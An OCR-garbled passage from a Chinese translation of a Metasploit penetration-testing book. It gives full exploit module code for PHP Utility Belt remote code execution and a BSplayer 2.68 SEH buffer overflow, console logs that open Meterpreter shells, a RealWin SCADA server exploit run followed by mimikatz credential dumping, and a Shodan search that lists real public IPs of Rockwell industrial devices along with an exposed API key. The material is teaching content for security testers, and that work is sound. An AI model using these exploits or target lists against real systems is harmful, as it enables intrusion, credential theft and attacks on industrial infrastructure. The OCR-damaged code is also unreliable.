接 下 来 在 Metasploit 中 编写 一 个 针对 PHP utility belt 远 程 代 码 执行 漏洞 的 渗透 模块 ， 其 中 的 代 
人 码 如 下 : 


require 'msf/core' 
class Metasploit4 « Msf::Exploit::Remote 


include Msf::Exploit::Remote::HttpClient 


def initialize(info = () 
super(update info(info, 
'Name' -» 'PHP Utility Belt Remote Code Execution', 
'Description' => %q{ 


This module exploits a remote code execution vulnerability in PHP 
Utility Belt 
y. 
'Author' I» 
[ 
'Nipun Jaswal', 
l, 


'DisclosureDate' => 'May 16 2015', 
'Platform' -» 'php', 
'Payload' I» 
{ 
'Space' => 20.0.07 


'DisableNops' -» true 
Fa 
'Targets' I2» 
[ 
['PHP Utility Belt', {}] 
l], 
'DefaultTarget' 2-0 
) ) 


register options( 
[ 
OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', 
'/php-utility-belt/ajax.php']), 
OptString.new('CHECKURI',[false,'Checking Purpose','/php-utility- 
belt/info.php']), 
], self.class) 
end 
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在 初始 化 部 分 中 , 我 们 导入 了 所 有 所 需 的 库 文件 ， 并列 出 了 模块 的 必要 信息 。 因 为 我 们 要 渗 
透 的 目标 是 一 个 基于 PHP 的 漏洞 ， 所 以 选择 的 目标 平台 是 PHP。 因 为 现在 的 漏洞 在 一 个 Web 应 用 
程序 中 ， 而 不 是 在 之 前 的 那 种 软件 程序 中 ， 所 以 要 将 DisableNops 的 值 设置 为 true 以 关闭 攻击 
载荷 中 的 NOP。 这 个 漏洞 在 ajax.php 文 件 中 , 因此 要 将 TARGETURI 的 值 设 置 为 ajax.php 文 件 的 位 置 。 
另外 我 们 还 创建 了 一 个 名 为 cHECKURI 的 新 字符 串 变 量 ， 可 以 用 它 来 创建 检查 方法 。 下 面 是 渗透 
模块 的 下 一 部 分 : 


Qef check 
send request cgi( 
'method' ES 
vgra! => normalize uri(target uri.path), 
'vars post' => { 
'code' -» "fwrite(fopen('info.php','w'),'«?php echo 
phpinfo();?>');" 
} 
) 
resp = send request raw({'uri' => 
normalize uri(datastore['CHECKURI']),'method' => 'GET'}) 
if resp.body =~ /phpinfo()/ 
return Exploit::CheckCode::Vulnerable 
else 
return Exploit::CheckCode::Safe 
end 
end 


我 们 使 用 senaq_request_cgi 方 法 将 POST 请 求 以 一 种 高 效 的 方式 发 送出 去 。 将 变量 methoa 
的 值 设 置 为 PosT， 将 URI 的 值 设 置 为 以 普通 格式 表示 的 目标 URI，PoSsT 的 参数 copE 的 值 为 
fwrite(fopen('info.php','w'),'«?php echo phpinfo();?»');s 这 个 攻击 载荷 将 会 创 
建 一 个 名 为 info.php 的 新 文件 。 当 代码 执行 的 时 候 ， 这 个 文件 将 会 展示 所 有 的 PHP 信 息 。 我 们 还 
创建 了 另 一 个 请 求 ， 用 来 获取 新 创建 的 info.php 文 件 的 内 容 一 一 这 是 使 用 senq_reauest_raw 并 
将 methog 的 值 设置 为 GET 实 现 的 。 之 前 创建 的 变量 cHECKURI 将 作为 这 个 请 求 的 URI。 


这 个 请 求 的 结果 保存 在 了 resp 变 量 中 。 接 下 来 ,将 resp 的 body 部 分 与 表达 式 bhpinfo () 进 
行 比 较 。 如 果 比 较 结果 为 true ， 就 表示 已 在 目标 主机 上 成 功 创建 了 info.php 文 件 ， 
Exploit::CheckCode: :Vulnerable 的 值 将 会 返回 给 用 户 , 这 将 展示 一 条 目标 主机 存在 漏洞 的 
信息 。 否则 这 个 目标 将 被 标记 为 Exploit::CheckCode: :Safe， 这 表示 它 是 安全 的 。 下 面 来 查 
看 exploit 方 法 : 


def exploit 
send request cgi( 


'method' =s SPOST':; 
Uis -» normalize uri(target uri.path), 
'vars, post' => f 
'code' -» payload.encoded 
} 
) 
end 
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我 们 刚刚 创建 了 一 个 简单 的 PosT 请 求 ， 个 请 求 的 code 部 分 包含 了 我 们 的 攻击 载荷 。 
当 它 在 目标 上 执行 的 时 候 ， en ha 下 面 来 看 看 这 
个 渗透 过 程 。 


> use exploit/mm/php-belt 
exploit(php-belt) » set RHOST 192.168.10.104 
HOST -» 192.168.10.104 
sf exploit(php-belt) » set payload php/meterpreter/bind tcp 
ayload => php/meterpreter/bind tcp 
msf exploit(php-belt) > check 
| 192.168.10.104:80 - The target is vulnerable. 
Imsf exploit(php-belt) > exploit 


[*] Started bind handler 
[*] Sending stage (33068 bytes) to 192.168.10.104 
[*] Meterpreter session 1 opened (192.168.10.118:45443 -» 192.168.10.104:4444) at 2016-05-09 15:41:0 


| «0530 


eterpreter » 
peterpreter » sysinfo 

omputer : DESKTOP-PESQ21S 

S : Windows NT DESKTOP-PESQ21S 6.2 build 9200 (Windows 8 Professional Edition) i586 
eterpreter : php/php 


我 们 已 经 获得 目标 的 Meterpreter 权 限 ， 并 将 这 个 远程 代码 执行 渗透 模块 转换 成 了 一 个 可 以 正 
常 工作 的 Metasploit 涂 透 模 块 了 。 


0 Metasploit 已 经 有 了 渗透 PHP utility belt 漏 洞 的 官方 模块 ， 可 以 从 以 下 地 址 下 
载 这 个 模块 : https:/www.exploit-db.com/exploits/39554/。 


4.3 ”将 TCP 服务 端 /基于 浏览 器 的 渗透 模块 导入 Metasploit 
我 们 将 在 本 节 看 到 如 何 将 基于 浏览 器 或 者 TCP 服 务 端 的 渗透 模块 导入 Metasploit。 


在 对 应 用 程序 进行 测试 或 者 渗透 测试 时 ， 我 们 可 能 会 遇 到 因 目 标 软件 在 解析 请 求 /回应 数据 
时 失败 从 而 导致 月 省 的 情况 。 来 看 一 个 存在 漏洞 的 应 用 程序 在 解析 数据 时 会 发 生 什么 。 


r 3 
E CAWindowsWsystem32Vcmd.exe - 36477.py 127.0.0.1 81 | | x) 


^ 


C: \Users\Apex\Desktop>36477.py 127.0.0.1 81 
[x] Listening on port 81 


Lau 


Open URL 


Open 
hitp://127.0.0.1:81 
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示例 所 使 用 的 应 用 程序 是 BSplayer 2.68。 可 以 看 到 ,在 81 端 口上 运行 着 一 个 Python 渗 透 模 块 。 
这 个 漏洞 源 于 对 远程 服务 器 响应 的 解析 一 一 当 用 户 尝 试 从 一 个 URL 处 播放 视频 时 。 试 试 从 81 端 口 
监听 数据 流 ， 看 看 会 发 生 什 么 。 


画 CAWindows\system32\cmd.exe [eel] x y 


C: \Users\Apex\Desktop>36477.py 127.0.0.1 81 

[x] Listening on port 81 

('[x] Sending the payload first time', ('127.0.0.1', 49775)) 
('[*] Sending the payload second time', ('127.0.0.1', 49776)) 


Lu] 


C:\Users\Apex\Desktop> 


二 Calculator 


View Edit Help 


L7 ICs J[ 9 malia 


| 4 
ngng” 


3 


«I 


异 幕 上 弹出 了 计算 融 应 用 程序 ， 这 表示 渗透 模块 已 经 成 功 完成 了 任务 。 


0 可 以 从 https://www.exploit-db.com/exploits/36477/ 下 载 这 个 针对 BSplayer 2.68 
的 Python 渗透 模块 。 


来 看 看 这 个 渗透 模块 的 代码 ， 并 从 中 收集 构建 Metasploit 模 块 必需 的 信息 。 


buf = 
buf += 
buf += 
buf += 
buf += " 
buf += 
buf += 
buf += 
buf += " 
buf += 
buf += 
buf += 
buf += " 


buflen = len (buf) 

response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 
c.send (response) 

c.close() 

Cc, addr = s.acce c0 

Iprint(('[*] Se ng the payload second time', addr)) 


c.recv (1024) 
c.send (response) 
c.close() 
s.close() 
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这 个 渗透 模块 十 分 简单 。 它 的 编写 者 利用 向 后 跳 转 技术 找到 要 传递 给 攻击 载荷 的 ShellCode， 
这 是 一 种 用 于 解决 空间 限制 的 技术 。 还 有 一 点 需要 注意 : 编写 者 向 目标 发 送 了 两 次 恶意 绥 冲 区 的 
数据 来 执行 攻击 载荷 , 这 是 由 漏洞 的 性 质 决定 的 。 我 们 在 下 一 方 中 将 为 所 有 所 需 的 数据 建立 一 个 


表 ， 利 用 这 些 数据 可 以 将 这 个 渗透 模块 转化 成 一 个 Metasploit 兼 容 的 模块 。 


4.3.1 ”收集 关键 信息 
下 表 展示 了 所 有 必需 的 值 及 其 用 途 。 


F 号 zog 值 
1 偏 移 量 2048 
2 已 知 PoP-POP-RETN 系 列 指令 /P-P-R 在 内 存 中 的 地 址 0x0000583b 
3 向 后 跳 转 / 到 ShellCode 的 长 跳 转 \xe9\x85\xe9\xff\xff 
4 得 跳 转 /指向 下 一 个 SEH 帧 的 指针 \xeb\xf9\x90\x90 


我 们 现在 已 经 拥有 了 构建 渗透 BSplayer 2.68 的 Metasploit 模 块 的 全 部 信息 了 。 


可 以 看 到 , 编写 


者 将 ShellCode 放 置 在 了 2048 个 NOP 之 后 ,不 过 这 并 不 意味 着 实际 偏 移 量 就 是 204 
SEH 覆 盖 区 的 前 面 是 因为 必须 要 给 ShellCode 保 留 足 够 的 空间 。 不 过 我 们 仍然 采 月 


8 一 一 将 它 放置 在 
这 个 值 作为 偏 移 


E, 这 是 为 了 严格 遵循 原始 程序 的 设计 。 此 外 ，\xcc 是 一 个 断 点 操作 码 ， 但 是 在 这 个 渗透 模块 
中 ， 它 被 用 来 实现 填充 。 考 虑 到 空间 的 限制 ， 变 量 jmplong 中 存储 了 到 ShellCode 的 向 后 跳 转 。 
nseh 变 量 中 存储 了 下 一 帧 的 地 址 ， 也 就 是 我 们 在 上 一 章 中 讨论 过 的 短 跳 转 。seh 变 量 中 保存 了 


P/P/R 指 令 序 列 的 地 址 。 


qp 有 一 点 必须 要 指出 : 在 当前 情景 中 ， 需 要 目标 计算 机 主动 来 连接 我 们 的 渗透 


服务 器 ， 而 不 是 我 们 去 连接 目标 服务 器 。 因 此 我 们 的 渗透 服务 器 必 


须 时 刻 对 即将 


到 来 的 连接 处 于 监听 状态 。 当 收 到 目标 的 请 求 之 后 ， 要 向 其 发 送 恶意 的 内 容 。 


4.3.2 创建 Metasploit 模块 
先 来 看 一 下 Metasploit 中 渗透 模块 的 代码 部 分 : 


require 'msf/core' 


class Metasploit3 « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::TcpServer 


def initialize(info-()) 
super(update info(info, 
'Name' -» "BsPlayer 2.68 SEH Overflow Exploit", 
'Description' => %q{ 
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Here's an example of Server Based Exploit 


), 


'Author' => [ 'Nipun Jaswal' ], 
'Platform' Sx eW 
'Targets' E> 


[ 
[ 'Generic', ('Ret' => 0x0000583b, 'Offset' => 2048} ], 
le 
'Payload' => 
{ 
'BadChars' => "XAx00 Vx0a x20 Nx0d" 
} 
'DisclosureDate' => "May 19 2016", 
'DefaultTarget' => 0)) 
end 


到 目前 为 止 我 们 已 经 编写 过 很 多 渗透 模块 了 ， 上 面 的 代码 并 无 很 大 差别 ， 唯 一 的 不 同 之 处 
在 于 从 /lib/msf/core/exploit/tcp_server.rb 引 入 了 一 个 TCP server 库 。 这 个 TCP server 库 提供 了 处 理 
传人 请 求 所 需 的 各 种 方法 和 额外 的 选项 ， 例 如 SRvHosT 、SRVPORT 和 SSsL。 下 面 是 代码 的 剩余 
部 分 : 
def on client connect (client) 


return if ((p - regenerate payload(client)) -- nil) 
print status("Client Connected") 


sploit = make nops(target['Offset']) 

sploit << payload.encoded 

sploit << "Wxcc" * (6787-2048 - payload.encoded.length) 
Sploit << "\xe9\x85\xe9\xff\xff" 


sploit << [target.ret].pack('V') 
client.put(sploit) 
client.get once 
client.put(sploit) 
handler (client) 
service.close client(client) 
end 
end 


我 们 并 没有 在 这 些 渗透 模块 中 使 用 什么 渗透 函数 ， 而 是 使 用 了 on_client_connect、 
on_client_data 和 on_client_disconnect 这 几 个 函数 。 其 中 最 重要 ， 也 是 最 简单 的 函数 就 
是 on_client_connect， 在 配置 渗透 客户 端的 SRVHOST 和 SRVPORT 时 就 会 用 到 这 个 也 数 。 


sploit << "\xeb\xf9\x90\x90" 


我 们 已 经 使 用 Metasploit 中 的 make_nops 函 数 创建 了 NOP， 并 使 用 payload.encoded 将 这 些 NOP 
檬 入 到 了 攻击 载荷 中 ， 从 而 避免 了 在 攻击 载 答 中 使 用 硬 编码 。 我 们 使 用 和 原始 渗透 模块 相同 的 内 容 
装 变量 sploit 的 剩余 部 分 。 当 需要 时 ， 可 以 使 用 client .put () 函数 将 恶意 数据 发 送 到 目标 ， 

个 函数 的 作用 就 是 将 选中 的 数据 发 送 到 目标 。 但 是 这 个 渗透 模块 需要 向 目标 发 送 两 次 数据 ， 所 以 
s 能 在 两 次 发 送 之 间 使 用 client .get_once 函 数 保证 数据 是 分 两 次 发 送 的， 否则 这 两 块 数据 可 
能 会 被 合并 成 一 个 单元 被 一 起 发 送出 去 。 当 数据 分 两 次 成 功 发 送 之 后 , 使 用 handler 查 找 从 渗透 模块 传 
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回 的 会 话 。 最 后 ， 使 用 service.client_close 关 闭 这 次 与 目标 的 连接 。 
可 以 看 到 ， 代 码 中 使 用 了 client 对 象 。 这 是 因为 从 指定 目标 返回 的 传人 请 求 被 看 作 是 一 个 


独立 的 对 象 ， 允 许 同一 时 间 由 多 个 目标 连接 。 
来 看 看 这 个 Metasploit 模 块 的 实际 运行 过 程 。 


msf > use exploit/windows/masteringmetasploit/bsplayer 
msf exploit(bsplayer) > set SRVHOST 192.168.10.118 
SRVHOST => 192.168.10.118 

msf exploit(bsplayer) » set SRVPORT 8080 

SRVPORT => 8080 


payload -» windows/meterpreter/reverse tcp 

msf exploit(bsplayer) » set LHOST 192.168.10.118 
LHOST -» 192.168.10.118 

msf exploit(bsplayer) » set LPORT 8888 

LPORT -» 8888 

msf exploit(bsplayer) » exploit 

[*] Exploit running as background job. 


[*] Started reverse TCP handler on 192.168.10.118:8888 
msf exploit(bsplayer) > [+] Server started. 


msf exploit(bsplayer) » set payload windows/meterpreter/reverse tcp 


如 下 图 所 示 ， 从 BSplayer 2.68 连 接 到 渗透 服务 器 的 8080 端 口上 。 


当 试 图 和 渗透 模块 控制 程序 建立 连接 的 时 候 ， 一 个 Meterpreter 攻 击 载荷 就 会 被 发 送 到 目标 


上 ， 从 而 产生 如 下 图 所 示 的 结果 。 


[*] Client Connected 
[*] Sending stage (957487 bytes) to 192.168.10.105 


Ə «0530 


msf exploit(bsplayer) > 


[*] Meterpreter session 1 opened (192.168.10.118:8888 -> 192.168.10.105:49790) at 2016-05-09 23:30:5 


好 了 ! 现在 已 经 获得 目标 的 Meterpreter 命 令 权 限 。 我 们 使 用 Metasploit 中 的 TCP server 库 编 
写 了 一 个 渗透 的 服务 器 模块 。 在 Metasploit 中 , 我 们 还 可 以 使 用 HTTP server 库 建立 HTTP 服 务 功 


能 模块 。 
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3 如 果 想 获取 关于 HTTP 服 务 功 能 的 更 多 信息 ,可 以 访问 /lib/msf/core/exploit/http/server.rb。 


4.4 小 结 


在 经 过 了 大 量 的 渗透 模块 移植 实验 之 后 ， 我 们 已 经 完成 了 将 各 种 渗透 模块 移植 到 Metasploit 
中 的 任务 。 经 过 本 章 的 学 习 ， 我 们 知道 了 如 何 轻 松 地 将 各 种 渗透 模块 移植 到 Metasploit 框 架 中 。 
在 本 章 中 , 我 们 建立 了 从 独立 模块 中 找到 要 领 的 方法 , 学 习 了 各 种 函数 以 及 它们 在 渗透 开发 中 的 
作用 ,还 复习 了 关于 SEH 的 渗透 模块 的 知识 ， 以 及 如 何 建立 渗透 服务 。 

到 此 为 止 , 我 们 已 经 接触 了 大 部 分 的 渗透 模块 编写 练习 。 从 下 一 章 开始 起 ,我们 将 会 看 到 如 
何 使 用 Metasploit 完 成 对 各 种 服务 的 测试 ， 以 及 如 何 具 体 实现 对 各 种 服务 ( 例如 VOIP、DBMS 以 
及 SCADA ) 的 渗透 测试 。 


使 用 Metasploit 对 服务 进行 
测试 


“事前 花 一 分 钱 来 保证 安全 ， 总 比 事后 花 一 元 钱 来 弥补 要 好 得 多 。” 


Santosh Khadsare， 网 络 犯罪 调查 员 


现在 让 我 们 将 目光 转向 对 各 种 专业 服务 的 渗透 测试 。 作 为 渗透 测试 工程 师 , 你 在 职业 生涯 中 
很 可 能 遇 到 这 样 的 公司 客户 或 者 渗透 环境 他 们 仅仅 需要 对 某 一 个 特定 的 服务 器 进行 渗透 测试 ， 
这 个 服务 器 上 可 能 运行 着 数据 库 、IP 电 话 (Voice Over Internet Protocol, VORP ) 或 者 监控 和 数据 
采集 系统 (Supervisory Control and Data Acquisition, SCADA )。 本 章 在 实现 对 这 些 服务 的 渗透 的 
同时 ， 还 要 对 使 用 的 方法 进行 完善 。 本 章 将 着 眼 于 以 下 几 个 要 点 。 


口 理解 对 SCADA 的 渗透 过 程 。 

OQ 工业 控制 系统 (Industrial Control System, ICS) 的 原理 以 及 关键 特性 。 
口 实现 数据 库 渗透 测试 。 

口 对 VOIP 服务 进行 渗透 测试 。 


成 功 完成 一 次 对 特定 服务 的 渗透 测试 需要 娴熟 的 渗透 技巧 以 及 对 服务 的 深刻 理解 。 本 童 将 从 
这 两 个 方面 下 手 ， 完 成 对 服务 进行 的 渗透 测试 。 


5.1 SCADA 系统 的 基本 原理 


SCADA 现 在 已 经 广泛 应 用 在 堤坝 、 发 电站 、 炼 油 广 以 及 大 型 服务 名 控制 服务 等 方面 的 管 
理 中 。 


SCADA 主 要 用 于 完成 高 度 专业 的 任务 ， 例 如 对 水 位 的 调度 控制 、 天 然 气管 道 的 输送 、 电 力 
网 络 的 控制 ， 等 等 。 
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5.1.1 ICS 的 基本 原理 以 及 组 成 部 分 


SCADA 系 统 是 ICS 系 统 , 通常 用 在 一 些 很 关键 的 环境 中 。 一 旦 出 现 问题 ,将 很 有 可 能 危及 人 
类 生命 。ICS 通 常 应 用 在 大 型 工业 生产 中 ， 负 责 控制 各 种 生产 过 程 ， 例 如 按照 一 定 比例 混合 两 种 
化 学 药品 、 在 特定 环境 中 加 入 二 氧化 碳 、 向 锅炉 中 加 入 适量 的 水 ， 等 等 。 


这 种 SCADA 系 统 的 组 成 部 分 如 下 所 示 。 


组 成 部 分 用 途 
远程 终端 单元 这 是 一 种 可 以 将 模拟 类 型 的 测试 值 转换 为 数字 信息 的 装置 
(Remote Terminal Unit, RTU) 
可 编程 逻辑 控制 器 这 个 部 件 集 成 了 输入 输出 服务 器 和 实时 操作 系统 ， 它 的 工作 与 RTU 十 分 相 
(Programmable Logic Controller, PLC) 似 。 它 也 可 以 使 用 各 种 网 络 协议 (例如 FTP、SSH) 
人 机 界面 这 是 一 个 可 以 直接 观察 或 者 通过 SCADA 系 统 控 制 的 图 形 化 显示 环境 
(Human Machine Interface, HMI) 
智能 电子 设备 这 基本 上 就 是 一 个 微 蕊 片 ， 具 体 来 说 就 是 一 个 控制 器 。 它 可 以 通过 发 送 命 
(Intelligent Electronic Device, IED) 令 来 完成 指定 的 任务 ， 例 如 在 加 入 特定 剂量 的 某 种 物质 与 另 一 物质 混合 之 


后 关闭 阀门 等 
5.1.2 ICS-SCADA 安全 的 重要 性 


ICS 起 着 十 分 关键 的 作用 , 一 旦 它们 的 控制 权 落 入 到 不 法 分 子 手中 , 将 会 产生 灾难 性 的 后 果 。 
可 以 试想 一 下 ,如 果 天 然 气管 道 的 电路 控制 系统 唱 到 了 恶意 拒绝 服务 攻击 , 这 可 不 仅仅 会 给 我 们 
带 来 点 麻烦 而 已 一 一 某 些 SCADA 系 统 的 损坏 是 会 要 人 命 的 。 你 也 许 看 过 电影 《 虎 胆 龙 威 4》 其 
中 黑客 们 控制 了 天 然 气管 道 ， 这 看 起 来 好 像 很 酪 ; 他 们 还 引起 了 交通 混乱 ， 这 好 像 也 很 有 趣 。 但 
在 现实 生活 中 ， 一 且 这 种 事情 发 生 ， 将 会 造成 十 分 严重 的 破坏 ， 甚 至 会 夺 走 一 些 人 的 生命 。 

正如 我 们 过 去 看 到 的 那样 ， 随 着 震 网 病毒 ( Stuxnet worm ) 的 出 现 ，ICS 和 SCADA 系 统 的 安 
全 性 遭 到 了 严重 的 侵犯 。 接 下 来 将 讨论 如 何 渗透 进入 一 个 SCADA 系 统 ， 或 者 如 何 对 它们 进行 测 
试 以 确保 它们 的 安全 ， 以 此 来 共 创 一 个 安全 的 未 来 。 


5.1.3. SCADA 系统 的 安全 性 分 析 

本 节 将 会 讨论 如 何 渗透 进入 SCADA 系 统 。 现 在 有 很 多 可 以 测试 SCADA 系 统 的 工具 , 但 是 对 
它们 的 讨论 将 会 超出 本 书 的 范围 。 因 此 ， 为 了 保证 本 书简 单 易 读 ， 我 们 在 这 部 分 内 容 只 介绍 以 
Metasploit 为 工具 对 SCADA 的 渗透 。 


1. 测试 SCADA 的 基本 原理 


让 我 们 开始 了 解 渗 透 SCADA 系 统 的 基本 知识 。 最 近 Metasploit 中 添加 了 很 多 渗透 模块 ， 利 用 
这 些 模块 可 以 渗透 进 和 SCADA 系统。 另外， 部 分 SCADA 服 务 器 还 在 使 用 默认 的 用 户 名 和 密码 ， 
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虽然 这 种 情形 现在 很 少见 ， 但 它 的 确 存 在 。 


现在 尝试 着 来 找 出 一 些 SCADA 服 务 器 , 可 以 利用 http:/www.shodanhq.com 这 个 优秀 的 资源 来 


7! 
完成 这 个 任务 。 


(1) 首先 ， 在 Shodan 网 站 创建 一 个 账号 。 
(2) 成 功 注 册 后 ， 可 以 在 账户 的 Shodan 服 务 中 找到 API 密 钥 。 利 用 这 个 密 钥 ， 可 以 通过 


Metasploit 搜 索 各 种 服务 。 


Q) 先 尝试 找 出 采用 罗 克 韦 尔 自动 化 技术 


gather/shodan_search 模 块 。 


的 SCADA 系 统 ， 这 个 过 程 需要 用 到 auxiliary/ 


(4) 将 oUERY 参 数 的 值 设 定 为 Rockwel11， 并 查看 查找 的 结果 ， 结 果 如 下 图 所 示 。 


SHODAN APIKEY 


msf > use auxiliary/gather/shodan search 
msf auxiliary(shodan search) > show options 


Module options (auxiliary/gather/shodan search): 


Name Current Setting Required 
DATABASE false no 
MAXPAGE 1 yes 
OUTFILE no 
Proxies no 
ort[,type:host:port][...] 
QUERY yes 
REGEX .* yes 
/Country/Hostname 


yes 


msf auxiliary(shodan search) > set SHODAN APIKEY RxSqYSOYrs3Krqx7HgiwWEqm2Mv5XsQa 
SHODAN APIKEY => RxSqYSOYrs3Krqx7HgiwWEqm2Mv5XsQa 


Description 


Add search results to the database 
Max amount of pages to collect 

A filename to store the list of IPs 
A proxy chain of format type:host:p 


Keywords you want to search for 
Regex search for a specific IP/City 


The SHODAN API key 


(5) 将 SHODAN_APIKEY 选 项 的 值 设 置 为 Shodan 服 务 的 API 密 钥 ， 然 后 将 QUERY 选 项 的 值 设 置 
为 Rockwe11， 得 到 如 下 图 所 示 的 结果 。 


IQUERY => Rockwell 
msf auxiliary(shodan search) > run 


[*] Collecting data, please wait... 


Search Results 


IP:Port City 
104.159.239.246:44818 Holland 
107.85.58.142:44818 N/A 
109.164.235.136:44818 Stafa 
119.193.250.138:44818 N/A 
12.109.102.64:44818 Parkersburg 
121.163.55.169:44818 N/A 
123.209.231.230:44818 N/A 
123.209.234.251:44818 N/A 
148.64.180.75:44818 N/A 
148.78.224.154:44818 N/A 
157.157.218.93:44818 — N/A 


[sf auxiliary(shodan search) > set QUERY Rockwell 


[*] Total: 4249 on 43 pages. Showing: 1 page(s) 


United States 
United States 
Switzerland 

Korea, Republic of 
United States 
Korea, Republic of 
Australia 
Australia 

United States 
United States 
Iceland 


104-159-239-246.static.sgnw.mi.charter.com 
136.235.164.109.static.wline.lns.sme.cust.swisscom.ch 


cas-wv-cpe-12-109-102-64.cascable.net 


vsat-148-64-180-75.c005.g4.mrt.starband.net 
misc-148-78-224-154.pool.starband.net 
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可 以 清楚 看 到 ， 我 们 在 互联 网 上 找到 了 大 量 采 用 Rockwell 自动化 技术 的 正在 运行 的 SCADA 
服务 器 。 


2. 基于 SCADA 的 渗透 模块 


最 近 一 段 时 间 ，SCADA 系 统 被 渗透 的 事件 发 生 率 明显 提高 SCADA 系统 也 存在 着 各 种 各 样 
的 漏洞 ， 例 如 栈 溢出 漏洞 、 整 型 溢出 漏洞 、 跨 站 脚本 漏洞 和 有 SQL 注入 漏洞 。 


此 外 ， 这 些 漏洞 还 可 能 会 威胁 我 们 的 财产 和 生命 ， 这 一 切 正 如 之 前 讨论 过 的 那样 。 造 成 
SCADA 设 备 受 到 黑客 攻击 的 主要 原因 有 两 个 : SCADA 开 发 人 员 在 编程 时 的 疏 包 和 操作 人 员 在 控 
制 时 的 不 规范 。 


我 们 来 看 一 个 SCADA 设 备 的 例子 ， 并 尝试 使 用 Metasploit 来 对 其 进行 渗透 。 在 接 下 来 的 例子 
中 ， 我 们 将 会 在 Windows XP 上 运行 Metasploit 来 对 一 个 DATAC Realwin SCADA Server 2.0 系 统 进 
行 渗透 。 

由 于 这 个 运行 在 912 端 口上 的 服务 使 用 了 Ci 语言 中 的 sprintf 函 数 ， 因 此 存在 缓冲 区 溢出 漏 
洞 。DAIAC RealWin SCADA Server 的 源 代码 使 用 sprintf 函 数 显示 一 个 根据 用 户 输入 构成 的 特 
定 字 符 串 。 一 旦 这 个 漏洞 函数 被 攻击 者 利用 ， 就 可 能 导致 整个 系统 的 沦陷 。 


现在 就 使 用 Metasploit 中 的 渗透 模块 exploit/windows/scada/realwin_scpc_initialize 
完成 对 DATAC RealWin SCADA Server 2.0 的 渗透 。 这 个 过 程 如 下 图 所 示 。 


msf > use exploit/windows/scada/realwin scpc initialize 

msf exploit(realwin scpc initialize) > set RHOST 192.168.10.108 

(RHOST => 192.168.10.108 

msf exploit(realwin scpc initialize) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

ms 上 exploit(realwin scpc initialize) > show options 


Module options (exploit/windows/scada/realwin scpc initialize): 
Name Current Setting Required Description 


RHOST 192.168.10.108 yes The target address 
RPORT 912 yes The target port 


Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 
LPORT 4444 yes The listen port 

RHOST 192.168.10.108 no The target address 


Exploit target: 


0 Universal 
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将 这 里 RHosT 的 值 设 置 为 192.168.10.108, 将 攻击 载荷 的 值 设 置 为 windows /meterpreter/ 
bind tcp。 DATAC RealWin SCADA 所 使 用 的 默认 端口 为 912。 现 在 就 对 这 个 目标 进行 测试 ， 验 
证 该 漏洞 是 否 可 以 被 渗透 。 


Ist exploit(realwin scpc initialize) » exploit 


[*] Started bind handler 

[*] Trying target Universal... 

[*] Sending stage (957487 bytes) to 192.168.10.108 

[*] Meterpreter session 1 opened (192.168.10.118:38051 -> 192.168.10.108:4444) at 2016-05-10 02:21:15 +0530 


meterpreter > sysinfo 


Computer : NIPUN-DEBBE6F84 

los : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 

System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 


meterpreter > load mimikatz 
Loading extension mimikatz...success. 


好 了 ! 我 们 利用 这 这 个 漏洞 成 功 实 现 了 对 目标 的 渗透 。 接 下 来 载 人 mimikatz 模 块 来 查找 系统 
中 的 明文 密码 ， 这 个 过 程 如 下 图 所 示 。 


meterpreter > kerberos 

Not currently running as SYSTEM 
[*] Attempting to getprivs 

Got SeDebugPrivilege 
[*] Retrieving kerberos credentials 
kerberos credentials 


AuthID Package Domain User Password 
0;999 NTLM WORKGROUP NIPUN-DEBBE6F84$ 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;52163 NTLM 

0;996 Negotiate NT AUTHORITY NETWORK SERVICE 

0;176751 NTLM NIPUN-DEBBE6F84 Administrator 12345 


当 输入 命令 kerberos 之 后 ， 就 可 以 找到 以 明文 形式 保存 的 密码 了 。 我 们 将 会 在 本 书 的 后 半 
部 分 对 mimikatz 的 功能 和 其 他 库 进 行 详细 的 介绍 


在 Metasploit 中 有 大 量 以 SCADA 系 统 漏洞 为 目标 的 渗透 模块 。 如 果 想 获取 有 关 这 些 漏 洞 的 详 
细 信 息 ， 可 以 访问 互联 网 上 最 大 的 SCADA 黑 客 和 安全 技术 网 站 http:/www.scadahackercom。 在 
http://scadahacker.com/resources/msf-scada.html 页 面 上 的 msf-scada 部 分 也 有 大 量 有 关 渗 透 模 块 的 
=H 


Ho 


http://www.scadahacker.com 网 站 中 展示 了 近年 来 发 现 的 SCADA 系 统 的 各 种 漏洞 。 这 个 列表 的 
优势 在 于 它 提 供 了 漏洞 相关 的 SCADA 产 品 、 该 产品 的 供应 商 、 系 统 组 件 、Metasploit 中 的 相关 模 
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块 、 披 露 细节 以 及 在 发 起 攻击 之 前 启动 的 第 一 个 Metasploit 模 块 。 


每 隔 一 段 时 间 ，Metasploit 中 就 会 添加 一 些 关 于 系统 漏洞 的 最 新 渗透 模块 ， 这 使 Metasploit 可 以 
胜任 各 种 类 型 的 渗透 测试 任务 。 下 图 就 展示 了 http:/www.scadahacker.com 上 提供 的 各 种 漏洞 的 列表 。 


Metasploit Modules (via MSFUpdate / SVN) 


Vendor System / Component SCADAhacker Metasploit Disclosure | Initial MSF 
Reference Reference Date Release Date 
exploit/windows/scada/igss9 igssdataserver listall.rb Mar. 24, 2011 |May 16, 2011 
7-Technologies IGSS CS-11-080-03 ^ expl oit/windows/scada/igss9 igssdataserver rename.rb — Mar. 24, 2011 Jun. 9, 2011 
|CSA-11-132-01A lexploit/windows/scada/igss9 misc.rb Mar. 24, 2011 May 30, 2011 
auxiliary/admin/scada/igss exec 17.rb Mar. 21, 2011 Mar. 22, 2011 
AzeoTech DAQ Factory Click Here exploit/windows/scada/daqg factory bof.rb Sep. 13, 2011 |Sep. 17, 2011 
3S CoDeSys Click Here exploit/windows/scada/codesys web server.rb Dec. 2, 2011 |Dec 13, 2011 
BACnet OPC Client |CSA-10-264-01 exploit/windows/fileformat/bacnet csv.rb Sep. 16, 2010 Nov. 11, 2010 
